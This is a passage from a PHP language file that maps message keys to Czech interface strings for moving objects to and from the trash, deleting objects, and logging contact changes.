  	'success trash object' => 'Objekt byl úspěšně přesunut do koše',
  	'error trash object' => 'Přesunutí objektu do koše se nezdařilo',
	'success untrash object' => 'Objekt byl obnoven z koše úspěšně',
  	'error untrash object' => 'Obnovení objektu z koše se nezdařilo',
  	'success trash objects' => '{0} objekt(ů) bylo úspěšně přesunut(o) do koše',
  	'error trash objects' => 'Přesunutí {0} objekt(ů) do koše se nezdařilo',
	'success untrash objects' => '{0} objektů bylo úspěšně obnoven(o) z koše',
  	'error untrash objects' => 'Obnovení {0} objekt(ů) z koše se nezdařilo',
	'success delete object' => 'Objekt byl úspěšně smazán',
  	'error delete object' => 'Nelze smazat objekt',
  	
    'log add contacts' => '\'{0}\' přidán(o)',
    'log edit contacts' => '\'{0}\' aktualizován(o)',
    'log delete contacts' => '\'{0}\' smazán(o)',

  ); // array

?>
